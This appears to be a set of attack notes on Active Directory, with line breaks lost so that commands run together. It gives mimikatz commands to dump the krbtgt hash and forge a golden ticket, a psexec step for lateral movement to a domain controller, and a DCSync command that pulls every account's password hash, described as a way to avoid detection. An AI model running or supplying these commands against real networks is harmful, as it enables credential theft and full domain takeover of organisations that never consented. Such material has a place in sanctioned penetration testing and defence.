# Assuming that Victim account is member of Domain Admin or we have compromised the DC.# Let's extract pass hash of krbtgt account with mimikatz.mimikatzprivilege::debuglsadump::lsa/patch# Look for User:krbtgt and it's NTLM Hash.kerberos::purgekerberos::golden /user:<TOPI> /domain:<domain_name> /sid:S-1-5-21-1602875587-2787523311-2599479668 /krbtgt:<NTLM hash> /ptt
# This is allowed because DC trusts anything which is encrytped by krbtgt pass hash.misc::cmdpsexec.exe \\dc01cmd.exe# Lateral movement to DC.whoamiwhoami/groups
DCSync Attack
DSync (Domain ControllerSynchronization) -> Steal Pass hashes of all Admin Users in Domain.Methods:1) Laterally move to DC and run mimikatz to dump pass hash of every user.2) Steal ntdis.dit from DC.3) Above 2 requires tool upload and can get caught so we use 3rd method to abuse DC's functionality.# Login with a Local admin priv account and run mimikatz.mimikatzlsadump::dcsync /user:Administrator # Administrator is target account.
We can request a replication update with a DC and obtain the pass hashes of every account in Active Directory without ever logging in to the domain controller.